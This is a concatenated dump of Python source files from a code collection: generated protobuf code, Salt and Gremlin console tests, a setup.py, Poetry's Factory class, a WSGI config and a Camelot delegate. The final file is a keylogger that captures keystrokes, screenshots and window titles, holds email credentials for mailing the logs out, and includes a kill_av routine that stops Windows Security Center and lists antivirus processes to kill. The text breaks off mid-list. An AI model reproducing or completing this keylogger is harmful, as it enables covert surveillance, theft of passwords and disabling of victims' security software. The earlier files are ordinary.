serialized_pb=_b('\n:google/ads/googleads_v2/proto/errors/feed_item_error.proto\x12\x1egoogle.ads.googleads.v2.errors\x1a\x1cgoogle/api/annotations.proto\"\x87\x03\n\x11\x46\x65\x65\x64ItemErrorEnum\"\xf1\x02\n\rFeedItemError\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\x0b\n\x07UNKNOWN\x10\x01\x12.\n*CANNOT_CONVERT_ATTRIBUTE_VALUE_FROM_STRING\x10\x02\x12\'\n#CANNOT_OPERATE_ON_REMOVED_FEED_ITEM\x10\x03\x12*\n&DATE_TIME_MUST_BE_IN_ACCOUNT_TIME_ZONE\x10\x04\x12\x1c\n\x18KEY_ATTRIBUTES_NOT_FOUND\x10\x05\x12\x0f\n\x0bINVALID_URL\x10\x06\x12\x1a\n\x16MISSING_KEY_ATTRIBUTES\x10\x07\x12\x1d\n\x19KEY_ATTRIBUTES_NOT_UNIQUE\x10\x08\x12%\n!CANNOT_MODIFY_KEY_ATTRIBUTE_VALUE\x10\t\x12,\n(SIZE_TOO_LARGE_FOR_MULTI_VALUE_ATTRIBUTE\x10\nB\xed\x01\n\"com.google.ads.googleads.v2.errorsB\x12\x46\x65\x65\x64ItemErrorProtoP\x01ZDgoogle.golang.org/genproto/googleapis/ads/googleads/v2/errors;errors\xa2\x02\x03GAA\xaa\x02\x1eGoogle.Ads.GoogleAds.V2.Errors\xca\x02\x1eGoogle\\Ads\\GoogleAds\\V2\\Errors\xea\x02\"Google::Ads::GoogleAds::V2::Errorsb\x06proto3')
,
dependencies=[google_dot_api_dot_annotations__pb2.DESCRIPTOR,])
_FEEDITEMERRORENUM_FEEDITEMERROR = _descriptor.EnumDescriptor(
name='FeedItemError',
full_name='google.ads.googleads.v2.errors.FeedItemErrorEnum.FeedItemError',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UNKNOWN', index=1, number=1,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CANNOT_CONVERT_ATTRIBUTE_VALUE_FROM_STRING', index=2, number=2,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CANNOT_OPERATE_ON_REMOVED_FEED_ITEM', index=3, number=3,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DATE_TIME_MUST_BE_IN_ACCOUNT_TIME_ZONE', index=4, number=4,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KEY_ATTRIBUTES_NOT_FOUND', index=5, number=5,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INVALID_URL', index=6, number=6,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MISSING_KEY_ATTRIBUTES', index=7, number=7,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KEY_ATTRIBUTES_NOT_UNIQUE', index=8, number=8,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CANNOT_MODIFY_KEY_ATTRIBUTE_VALUE', index=9, number=9,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SIZE_TOO_LARGE_FOR_MULTI_VALUE_ATTRIBUTE', index=10, number=10,
serialized_options=None,
type=None),
],
containing_type=None,
serialized_options=None,
serialized_start=147,
serialized_end=516,
)
_sym_db.RegisterEnumDescriptor(_FEEDITEMERRORENUM_FEEDITEMERROR)
_FEEDITEMERRORENUM = _descriptor.Descriptor(
name='FeedItemErrorEnum',
full_name='google.ads.googleads.v2.errors.FeedItemErrorEnum',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_FEEDITEMERRORENUM_FEEDITEMERROR,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=125,
serialized_end=516,
)
_FEEDITEMERRORENUM_FEEDITEMERROR.containing_type = _FEEDITEMERRORENUM
DESCRIPTOR.message_types_by_name['FeedItemErrorEnum'] = _FEEDITEMERRORENUM
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
FeedItemErrorEnum = _reflection.GeneratedProtocolMessageType('FeedItemErrorEnum', (_message.Message,), dict(
DESCRIPTOR = _FEEDITEMERRORENUM,
__module__ = 'google.ads.googleads_v2.proto.errors.feed_item_error_pb2'
,
__doc__ = """Container for enum describing possible feed item errors.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.errors.FeedItemErrorEnum)
))
_sym_db.RegisterMessage(FeedItemErrorEnum)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
|
py | b40b3f8d99629397d102c45e2e30b33ecf7daf5f | from .reconstruction_GA import *
from .reconstruction_single import *
from .reconstruction_multi import *
from .phasing import * |
py | b40b3fe85ab828b0899975525b2ad21b9a55fddd | from output.models.ms_data.particles.particles_l023_xsd.particles_l023 import (
B,
R,
Doc,
)
__all__ = [
"B",
"R",
"Doc",
]
|
py | b40b3ff3e7cb3c833e89cf1833dc6ffd3008323b | import sys
from tests.support.case import ModuleCase
from tests.support.helpers import destructiveTest
from tests.support.unit import skipIf
class SysrcModuleTest(ModuleCase):
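    """Integration tests for the sysrc execution module (FreeBSD only; the
    destructive tests touch /etc/rc.conf)."""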
def setUp(self):
super().setUp()
ret = self.run_function("cmd.has_exec", ["sysrc"])
if not ret:
self.skipTest("sysrc not found")
@skipIf(not sys.platform.startswith("freebsd"), "FreeBSD specific")
def test_show(self):
ret = self.run_function("sysrc.get")
self.assertIsInstance(
ret, dict, "sysrc.get returned wrong type, expecting dictionary"
)
self.assertIn(
"/etc/rc.conf", ret, "sysrc.get should have an rc.conf key in it."
)
@skipIf(not sys.platform.startswith("freebsd"), "FreeBSD specific")
@destructiveTest
def test_set(self):
ret = self.run_function("sysrc.set", ["test_var", "1"])
self.assertIsInstance(
ret, dict, "sysrc.get returned wrong type, expecting dictionary"
)
self.assertIn(
"/etc/rc.conf", ret, "sysrc.set should have an rc.conf key in it."
)
self.assertIn(
"1",
ret["/etc/rc.conf"]["test_var"],
"sysrc.set should return the value it set.",
)
ret = self.run_function("sysrc.remove", ["test_var"])
self.assertEqual("test_var removed", ret)
@skipIf(not sys.platform.startswith("freebsd"), "FreeBSD specific")
@destructiveTest
def test_set_bool(self):
ret = self.run_function("sysrc.set", ["test_var", True])
self.assertIsInstance(
ret, dict, "sysrc.get returned wrong type, expecting dictionary"
)
self.assertIn(
"/etc/rc.conf", ret, "sysrc.set should have an rc.conf key in it."
)
self.assertIn(
"YES",
ret["/etc/rc.conf"]["test_var"],
"sysrc.set should return the value it set.",
)
ret = self.run_function("sysrc.remove", ["test_var"])
self.assertEqual("test_var removed", ret)
|
py | b40b40909d1fa67c4c6a30b7e82a7a6ab8a454fb | #!/usr/bin/env python
# coding: utf-8
"""
setup.py
~~~~~~~~~~
"""
from setuptools import setup
import unittest
def alipay_test_suite():
test_loader = unittest.TestLoader()
test_suite = test_loader.discover('tests')
return test_suite
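# Referenced below via test_suite="setup.alipay_test_suite", so
# `python setup.py test` discovers and runs everything under tests/.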
setup(
name="python-alipay-sdk",
version="3.0.1",
author="fzlee",
author_email="[email protected]",
description="Python SDK for AliPay, RSA is the only sign method we support",
license="BSD",
keywords="python sdk alipay",
url="https://github.com/fzlee/alipay",
packages=['alipay'],
classifiers=[
"Development Status :: 3 - Alpha",
"Topic :: Utilities",
"License :: OSI Approved :: BSD License",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
],
install_requires=["pycryptodomex==3.9.4", "pyOpenSSL==19.1.0"],
test_suite="setup.alipay_test_suite"
)
|
py | b40b41453253980e2f3985aed595463e61d826b9 | '''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
'''
import pexpect
class TestConsole(object):
# the base command must pass -C because if colors are enabled pexpect gets garbled input and tests won't pass
gremlinsh = "bash gremlin-console/bin/gremlin.sh -C "
def test_basic_console_operations(self):
child = pexpect.spawn(TestConsole.gremlinsh)
TestConsole._expect_gremlin_header(child)
TestConsole._send(child, "1-1")
child.expect("==>0\r\n")
TestConsole._expect_prompt(child)
TestConsole._close(child)
def test_just_dash_i(self):
child = pexpect.spawn(TestConsole.gremlinsh + "-i x.script")
TestConsole._expect_gremlin_header(child)
TestConsole._send(child, "x")
child.expect("==>2\r\n")
TestConsole._expect_prompt(child)
TestConsole._close(child)
def test_just_dash_dash_interactive(self):
child = pexpect.spawn(TestConsole.gremlinsh + "--interactive x.script")
TestConsole._expect_gremlin_header(child)
TestConsole._send(child, "x")
child.expect("==>2\r\n")
TestConsole._expect_prompt(child)
TestConsole._close(child)
def test_dash_i_with_args(self):
child = pexpect.spawn(TestConsole.gremlinsh + "-i y.script 1 2 3")
TestConsole._expect_gremlin_header(child)
TestConsole._send(child, "y")
child.expect("==>6\r\n")
TestConsole._expect_prompt(child)
TestConsole._close(child)
def test_dash_dash_interactive_with_args(self):
child = pexpect.spawn(TestConsole.gremlinsh + "--interactive y.script 1 2 3")
TestConsole._expect_gremlin_header(child)
TestConsole._send(child, "y")
child.expect("==>6\r\n")
TestConsole._expect_prompt(child)
TestConsole._close(child)
def test_dash_dash_interactive_with_args_and_equals(self):
child = pexpect.spawn(TestConsole.gremlinsh + "--interactive=\"y.script 1 2 3\"")
TestConsole._expect_gremlin_header(child)
TestConsole._send(child, "y")
child.expect("==>6\r\n")
TestConsole._expect_prompt(child)
TestConsole._close(child)
def test_dash_i_multiple_scripts(self):
child = pexpect.spawn(TestConsole.gremlinsh + "-i y.script 1 2 3 -i x.script -i \"z.script x -i = --color -D\"")
TestConsole._expect_gremlin_header(child)
TestConsole._send(child, "y")
child.expect("==>6\r\n")
TestConsole._expect_prompt(child)
TestConsole._send(child, "x")
child.expect("==>2\r\n")
TestConsole._expect_prompt(child)
TestConsole._send(child, "z")
child.expect("==>argument=\[x, -i, =, --color, -D\]\r\n")
TestConsole._expect_prompt(child)
TestConsole._close(child)
def test_dash_dash_interactive_multiple_scripts(self):
child = pexpect.spawn(TestConsole.gremlinsh + "--interactive y.script 1 2 3 --interactive x.script -i \"z.script x -i = --color -D\"")
TestConsole._expect_gremlin_header(child)
TestConsole._send(child, "y")
child.expect("==>6\r\n")
TestConsole._expect_prompt(child)
TestConsole._send(child, "x")
child.expect("==>2\r\n")
TestConsole._expect_prompt(child)
TestConsole._send(child, "z")
child.expect("==>argument=\[x, -i, =, --color, -D\]\r\n")
TestConsole._expect_prompt(child)
TestConsole._close(child)
def test_mixed_interactive_long_short_opts_with_multiple_scripts(self):
child = pexpect.spawn(TestConsole.gremlinsh + "--interactive y.script 1 2 3 --interactive x.script -i \"z.script x -i = --color -D\"")
TestConsole._expect_gremlin_header(child)
TestConsole._send(child, "y")
child.expect("==>6\r\n")
TestConsole._expect_prompt(child)
TestConsole._send(child, "x")
child.expect("==>2\r\n")
TestConsole._expect_prompt(child)
TestConsole._send(child, "z")
child.expect("==>argument=\[x, -i, =, --color, -D\]\r\n")
TestConsole._expect_prompt(child)
TestConsole._close(child)
def test_just_dash_e(self):
child = pexpect.spawn(TestConsole.gremlinsh + "-e x-printed.script")
child.expect("2\r\n")
TestConsole._close(child)
def test_just_dash_e_file_not_found(self):
child = pexpect.spawn(TestConsole.gremlinsh + "-e=x-printed.script")
child.expect("Gremlin file not found at \[=x-printed.script\]\.\r\n")
child.expect(pexpect.EOF)
def test_just_dash_dash_execute(self):
child = pexpect.spawn(TestConsole.gremlinsh + "--execute x-printed.script")
child.expect("2\r\n")
TestConsole._close(child)
def test_dash_e_with_args(self):
child = pexpect.spawn(TestConsole.gremlinsh + "-e y-printed.script 1 2 3")
child.expect("6\r\n")
TestConsole._close(child)
def test_dash_dash_execute_with_args(self):
child = pexpect.spawn(TestConsole.gremlinsh + "--execute y-printed.script 1 2 3")
child.expect("6\r\n")
TestConsole._close(child)
def test_dash_e_multiple_scripts(self):
child = pexpect.spawn(TestConsole.gremlinsh + "-e y-printed.script 1 2 3 -e x-printed.script -e \"z-printed.script x -e = --color -D\"")
child.expect("6\r\n")
child.expect("2\r\n")
child.expect("argument=\[x, -e, =, --color, -D\]\r\n")
TestConsole._close(child)
def test_dash_dash_execute_multiple_scripts(self):
child = pexpect.spawn(TestConsole.gremlinsh + "--execute y-printed.script 1 2 3 --execute x-printed.script --execute \"z-printed.script x -e = --color -D\"")
child.expect("6\r\n")
child.expect("2\r\n")
child.expect("argument=\[x, -e, =, --color, -D\]\r\n")
TestConsole._close(child)
def test_mixed_execute_long_short_opts_with_multiple_scripts(self):
child = pexpect.spawn(TestConsole.gremlinsh + "--execute y-printed.script 1 2 3 -e x-printed.script --execute \"z-printed.script x -e = --color -D\"")
child.expect("6\r\n")
child.expect("2\r\n")
child.expect("argument=\[x, -e, =, --color, -D\]\r\n")
TestConsole._close(child)
def test_no_mix_dash_i_and_dash_e(self):
child = pexpect.spawn(TestConsole.gremlinsh + "-i y.script 1 2 3 -i x.script -e \"z.script x -i --color -D\"")
child.expect("-i and -e options are mutually exclusive - provide one or the other")
child.expect(pexpect.EOF)
def test_debug_logging(self):
child = pexpect.spawn(TestConsole.gremlinsh + "-l DEBUG --execute y-printed.script 1 2 3")
child.expect("6\r\n")
TestConsole._close(child)
@staticmethod
def _expect_gremlin_header(child):
# skip/read the Gremlin graphics
child.expect("\r\n")
child.expect(["plugin activated: tinkerpop.server", "plugin activated: tinkerpop.utilities", "plugin activated: tinkerpop.tinkergraph"])
child.expect(["plugin activated: tinkerpop.server", "plugin activated: tinkerpop.utilities", "plugin activated: tinkerpop.tinkergraph"])
child.expect(["plugin activated: tinkerpop.server", "plugin activated: tinkerpop.utilities", "plugin activated: tinkerpop.tinkergraph"])
TestConsole._expect_prompt(child)
@staticmethod
def _send(child, line):
child.sendline(line)
child.expect(line + "\r\n")
@staticmethod
def _expect_prompt(child):
child.expect("gremlin> ")
@staticmethod
def _close(child):
child.sendline(":x")
|
py | b40b4210cca7a3bbd5f5a6bacb690bd3816245a8 | from pathlib import Path
from typing import TYPE_CHECKING
from typing import Dict
from typing import List
from typing import Optional
from cleo.io.null_io import NullIO
from poetry.config.config import Config
from poetry.config.file_config_source import FileConfigSource
from poetry.core.factory import Factory as BaseFactory
from poetry.core.toml.file import TOMLFile
from poetry.locations import CONFIG_DIR
from poetry.packages.locker import Locker
from poetry.packages.project_package import ProjectPackage
from poetry.plugins.plugin_manager import PluginManager
from poetry.poetry import Poetry
if TYPE_CHECKING:
from cleo.io.io import IO
from poetry.repositories.legacy_repository import LegacyRepository
class Factory(BaseFactory):
"""
Factory class to create various elements needed by Poetry.
"""
def create_poetry(
self,
cwd: Optional[Path] = None,
io: Optional["IO"] = None,
disable_plugins: bool = False,
) -> Poetry:
if io is None:
io = NullIO()
base_poetry = super().create_poetry(cwd)
locker = Locker(
base_poetry.file.parent / "poetry.lock", base_poetry.local_config
)
# Loading global configuration
config = self.create_config(io)
# Loading local configuration
local_config_file = TOMLFile(base_poetry.file.parent / "poetry.toml")
if local_config_file.exists():
if io.is_debug():
io.write_line(f"Loading configuration file {local_config_file.path}")
config.merge(local_config_file.read())
# Load local sources
repositories = {}
existing_repositories = config.get("repositories", {})
for source in base_poetry.pyproject.poetry_config.get("source", []):
name = source.get("name")
url = source.get("url")
if name and url and name not in existing_repositories:
repositories[name] = {"url": url}
config.merge({"repositories": repositories})
poetry = Poetry(
base_poetry.file.path,
base_poetry.local_config,
base_poetry.package,
locker,
config,
)
# Configuring sources
self.configure_sources(
poetry, poetry.local_config.get("source", []), config, io
)
plugin_manager = PluginManager("plugin", disable_plugins=disable_plugins)
plugin_manager.load_plugins()
poetry.set_plugin_manager(plugin_manager)
plugin_manager.activate(poetry, io)
return poetry
@classmethod
def get_package(cls, name: str, version: str) -> ProjectPackage:
return ProjectPackage(name, version, version)
@classmethod
def create_config(cls, io: Optional["IO"] = None) -> Config:
if io is None:
io = NullIO()
config = Config()
# Load global config
config_file = TOMLFile(Path(CONFIG_DIR) / "config.toml")
if config_file.exists():
if io.is_debug():
io.write_line(
"<debug>Loading configuration file {}</debug>".format(
config_file.path
)
)
config.merge(config_file.read())
config.set_config_source(FileConfigSource(config_file))
# Load global auth config
auth_config_file = TOMLFile(Path(CONFIG_DIR) / "auth.toml")
if auth_config_file.exists():
if io.is_debug():
io.write_line(
"<debug>Loading configuration file {}</debug>".format(
auth_config_file.path
)
)
config.merge(auth_config_file.read())
config.set_auth_config_source(FileConfigSource(auth_config_file))
return config
@classmethod
def configure_sources(
cls, poetry: Poetry, sources: List[Dict[str, str]], config: Config, io: "IO"
) -> None:
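# each source entry mirrors a [[tool.poetry.source]] table from pyproject.toml,
# carrying the "name", "url", "default" and "secondary" keys read below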
for source in sources:
repository = cls.create_legacy_repository(source, config)
is_default = source.get("default", False)
is_secondary = source.get("secondary", False)
if io.is_debug():
message = "Adding repository {} ({})".format(
repository.name, repository.url
)
if is_default:
message += " and setting it as the default one"
elif is_secondary:
message += " and setting it as secondary"
io.write_line(message)
poetry.pool.add_repository(repository, is_default, secondary=is_secondary)
# Put PyPI last to prefer private repositories
# unless we have no default source AND no primary sources
# (default = false, secondary = false)
if poetry.pool.has_default():
if io.is_debug():
io.write_line("Deactivating the PyPI repository")
else:
from poetry.repositories.pypi_repository import PyPiRepository
default = not poetry.pool.has_primary_repositories()
poetry.pool.add_repository(PyPiRepository(), default, not default)
@classmethod
def create_legacy_repository(
cls, source: Dict[str, str], auth_config: Config
) -> "LegacyRepository":
from poetry.repositories.legacy_repository import LegacyRepository
from poetry.utils.helpers import get_cert
from poetry.utils.helpers import get_client_cert
if "url" in source:
# PyPI-like repository
if "name" not in source:
raise RuntimeError("Missing [name] in source.")
else:
raise RuntimeError("Unsupported source specified")
name = source["name"]
url = source["url"]
return LegacyRepository(
name,
url,
config=auth_config,
cert=get_cert(auth_config, name),
client_cert=get_client_cert(auth_config, name),
)
@classmethod
def create_pyproject_from_package(cls, package: ProjectPackage, path: Path) -> None:
import tomlkit
from poetry.layouts.layout import POETRY_DEFAULT
pyproject = tomlkit.loads(POETRY_DEFAULT)
content = pyproject["tool"]["poetry"]
content["name"] = package.name
content["version"] = package.version.text
content["description"] = package.description
content["authors"] = package.authors
dependency_section = content["dependencies"]
dependency_section["python"] = package.python_versions
for dep in package.requires:
constraint = tomlkit.inline_table()
if dep.is_vcs():
constraint[dep.vcs] = dep.source_url
if dep.reference:
constraint["rev"] = dep.reference
elif dep.is_file() or dep.is_directory():
constraint["path"] = dep.source_url
else:
constraint["version"] = dep.pretty_constraint
if not dep.marker.is_any():
constraint["markers"] = str(dep.marker)
if dep.extras:
constraint["extras"] = sorted(dep.extras)
if len(constraint) == 1 and "version" in constraint:
constraint = constraint["version"]
dependency_section[dep.name] = constraint
path.joinpath("pyproject.toml").write_text(
pyproject.as_string(), encoding="utf-8"
)
|
py | b40b44ef23ac82cd0836709d959f00264cf1aff6 | """
WSGI config for bleacherstime_33873 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'bleacherstime_33873.settings')
application = get_wsgi_application()
|
py | b40b452e0082a3d83e27bac94488da6434d4d53f | # ============================================================================
#
# Copyright (C) 2007-2016 Conceptive Engineering bvba.
# www.conceptive.be / [email protected]
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Conceptive Engineering nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# ============================================================================
import logging
logger = logging.getLogger('camelot.view.controls.delegates.localfiledelegate')
import six
from ....core.qt import variant_to_py, Qt
from .customdelegate import CustomDelegate
from .customdelegate import DocumentationMetaclass
from camelot.view.controls import editors
from camelot.view.proxy import ValueLoading
@six.add_metaclass(DocumentationMetaclass)
class LocalFileDelegate(CustomDelegate):
"""Delegate for displaying a path on the local file system. This path can
either point to a file or a directory.
"""
editor = editors.LocalFileEditor
def __init__(
self,
parent=None,
**kw
):
CustomDelegate.__init__(self, parent, **kw)
def paint(self, painter, option, index):
painter.save()
self.drawBackground(painter, option, index)
value = variant_to_py( index.model().data( index, Qt.EditRole ) )
value_str = u''
if value not in (None, ValueLoading):
value_str = six.text_type(value)
self.paint_text(painter, option, index, value_str)
painter.restore()
|
py | b40b46444ba3fb801c43b2b99730cb94648ddb05 | #!/usr/bin/env python
import pynput.keyboard
import threading
import smtplib
import os
import shutil
import subprocess
import sys
import stat
import platform
import getpass
import time
import tempfile
from mss import mss
# 15 to 18 lines for "send_mail_with_attachment()" function
#==============================================================
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.application import MIMEApplication
from os.path import basename
#==============================================================
try:
import win32gui as w # Used to Get The Active Window Name
except Exception:
pass
class Keylogger:
def __init__(self, time_interval, email, password):
self.log = ""
self.interval = time_interval
self.email = email
self.password = password
self.temp_screenshot = tempfile.gettempdir() + "\\screenshot.png"
self.system_info = self.get_system_info()
self.lastWindow = "" #Used to Distinguish Log Data
self.victim_system = platform.system()
def kill_av(self):
try:
os.popen("net stop \"Security Center\"")
except Exception as e:
print("[!] Unable to Disable Security Center!\n")
print(f"Error : {e}")
try:
avs=['AAWTray.exe', 'Ad-Aware.exe', 'MSASCui.exe', '_avp32.exe', '_avpcc.exe', '_avpm.exe', 'aAvgApi.exe', 'ackwin32.exe', 'adaware.exe', 'advxdwin.exe', 'agentsvr.exe', 'agentw.exe', 'alertsvc.exe', 'alevir.exe', 'alogserv.exe', 'amon9x.exe', 'anti-trojan.exe', 'antivirus.exe', 'ants.exe', 'apimonitor.exe', 'aplica32.exe', 'apvxdwin.exe', 'arr.exe', 'atcon.exe', 'atguard.exe', 'atro55en.exe', 'atupdater.exe', 'atwatch.exe', 'au.exe', 'aupdate.exe', 'auto-protect.nav80try.exe', 'autodown.exe', 'autotrace.exe', 'autoupdate.exe', 'avconsol.exe', 'ave32.exe', 'avgcc32.exe', 'avgctrl.exe', 'avgemc.exe', 'avgnt.exe', 'avgrsx.exe', 'avgserv.exe', 'avgserv9.exe', 'avguard.exe', 'avgw.exe', 'avkpop.exe', 'avkserv.exe', 'avkservice.exe', 'avkwctl9.exe', 'avltmain.exe', 'avnt.exe', 'avp.exe', 'avp.exe', 'avp32.exe', 'avpcc.exe', 'avpdos32.exe', 'avpm.exe', 'avptc32.exe', 'avpupd.exe', 'avsched32.exe', 'avsynmgr.exe', 'avwin.exe', 'avwin95.exe', 'avwinnt.exe', 'avwupd.exe', 'avwupd32.exe', 'avwupsrv.exe', 'avxmonitor9x.exe', 'avxmonitornt.exe', 'avxquar.exe', 'backweb.exe', 'bargains.exe', 'bd_professional.exe', 'beagle.exe', 'belt.exe', 'bidef.exe', 'bidserver.exe', 'bipcp.exe', 'bipcpevalsetup.exe', 'bisp.exe', 'blackd.exe', 'blackice.exe', 'blink.exe', 'blss.exe', 'bootconf.exe', 'bootwarn.exe', 'borg2.exe', 'bpc.exe', 'brasil.exe', 'bs120.exe', 'bundle.exe', 'bvt.exe', 'ccapp.exe', 'ccevtmgr.exe', 'ccpxysvc.exe', 'cdp.exe', 'cfd.exe', 'cfgwiz.exe', 'cfiadmin.exe', 'cfiaudit.exe', 'cfinet.exe', 'cfinet32.exe', 'claw95.exe', 'claw95cf.exe', 'clean.exe', 'cleaner.exe', 'cleaner3.exe', 'cleanpc.exe', 'click.exe', 'cmesys.exe', 'cmgrdian.exe', 'cmon016.exe', 'connectionmonitor.exe', 'cpd.exe', 'cpf9x206.exe', 'cpfnt206.exe', 'ctrl.exe', 'cv.exe', 'cwnb181.exe', 'cwntdwmo.exe', 'datemanager.exe', 'dcomx.exe', 'defalert.exe', 'defscangui.exe', 'defwatch.exe', 'deputy.exe', 'divx.exe', 'dllcache.exe', 'dllreg.exe', 'doors.exe', 'dpf.exe', 'dpfsetup.exe', 'dpps2.exe', 'drwatson.exe', 'drweb32.exe', 'drwebupw.exe', 'dssagent.exe', 'dvp95.exe', 'dvp95_0.exe', 'ecengine.exe', 'efpeadm.exe', 'emsw.exe', 'ent.exe', 'esafe.exe', 'escanhnt.exe', 'escanv95.exe', 'espwatch.exe', 'ethereal.exe', 'etrustcipe.exe', 'evpn.exe', 'exantivirus-cnet.exe', 'exe.avxw.exe', 'expert.exe', 'explore.exe', 'f-agnt95.exe', 'f-prot.exe', 'f-prot95.exe', 'f-stopw.exe', 'fameh32.exe', 'fast.exe', 'fch32.exe', 'fih32.exe', 'findviru.exe', 'firewall.exe', 'fnrb32.exe', 'fp-win.exe', 'fp-win_trial.exe', 'fprot.exe', 'frw.exe', 'fsaa.exe', 'fsav.exe', 'fsav32.exe', 'fsav530stbyb.exe', 'fsav530wtbyb.exe', 'fsav95.exe', 'fsgk32.exe', 'fsm32.exe', 'fsma32.exe', 'fsmb32.exe', 'gator.exe', 'gbmenu.exe', 'gbpoll.exe', 'generics.exe', 'gmt.exe', 'guard.exe', 'guarddog.exe', 'hacktracersetup.exe', 'hbinst.exe', 'hbsrv.exe', 'hotactio.exe', 'hotpatch.exe', 'htlog.exe', 'htpatch.exe', 'hwpe.exe', 'hxdl.exe', 'hxiul.exe', 'iamapp.exe', 'iamserv.exe', 'iamstats.exe', 'ibmasn.exe', 'ibmavsp.exe', 'icload95.exe', 'icloadnt.exe', 'icmon.exe', 'icsupp95.exe', 'icsuppnt.exe', 'idle.exe', 'iedll.exe', 'iedriver.exe', 'iexplorer.exe', 'iface.exe', 'ifw2000.exe', 'inetlnfo.exe', 'infus.exe', 'infwin.exe', 'init.exe', 'intdel.exe', 'intren.exe', 'iomon98.exe', 'istsvc.exe', 'jammer.exe', 'jdbgmrg.exe', 'jedi.exe', 'kavlite40eng.exe', 'kavpers40eng.exe', 'kavpf.exe', 'kazza.exe', 'keenvalue.exe', 'kerio-pf-213-en-win.exe', 'kerio-wrl-421-en-win.exe', 'kerio-wrp-421-en-win.exe', 'kernel32.exe', 'killprocesssetup161.exe', 'launcher.exe', 'ldnetmon.exe', 
'ldpro.exe', 'ldpromenu.exe', 'ldscan.exe', 'lnetinfo.exe', 'loader.exe', 'localnet.exe', 'lockdown.exe', 'lockdown2000.exe', 'lookout.exe', 'lordpe.exe', 'lsetup.exe', 'luall.exe', 'luau.exe', 'lucomserver.exe', 'luinit.exe', 'luspt.exe', 'mapisvc32.exe', 'mcagent.exe', 'mcmnhdlr.exe', 'mcshield.exe', 'mctool.exe', 'mcupdate.exe', 'mcvsrte.exe', 'mcvsshld.exe', 'md.exe', 'mfin32.exe', 'mfw2en.exe', 'mfweng3.02d30.exe', 'mgavrtcl.exe', 'mgavrte.exe', 'mghtml.exe', 'mgui.exe', 'minilog.exe', 'mmod.exe', 'monitor.exe', 'moolive.exe', 'mostat.exe', 'mpfagent.exe', 'mpfservice.exe', 'mpftray.exe', 'mrflux.exe', 'msapp.exe', 'msbb.exe', 'msblast.exe', 'mscache.exe', 'msccn32.exe', 'mscman.exe', 'msconfig.exe', 'msdm.exe', 'msdos.exe', 'msiexec16.exe', 'msinfo32.exe', 'mslaugh.exe', 'msmgt.exe', 'msmsgri32.exe', 'mssmmc32.exe', 'mssys.exe', 'msvxd.exe', 'mu0311ad.exe', 'mwatch.exe', 'n32scanw.exe', 'nav.exe', 'navap.navapsvc.exe', 'navapsvc.exe', 'navapw32.exe', 'navdx.exe', 'navlu32.exe', 'navnt.exe', 'navstub.exe', 'navw32.exe', 'navwnt.exe', 'nc2000.exe', 'ncinst4.exe', 'ndd32.exe', 'neomonitor.exe', 'neowatchlog.exe', 'netarmor.exe', 'netd32.exe', 'netinfo.exe', 'netmon.exe', 'netscanpro.exe', 'netspyhunter-1.2.exe', 'netstat.exe', 'netutils.exe', 'nisserv.exe', 'nisum.exe', 'nmain.exe', 'nod32.exe', 'normist.exe', 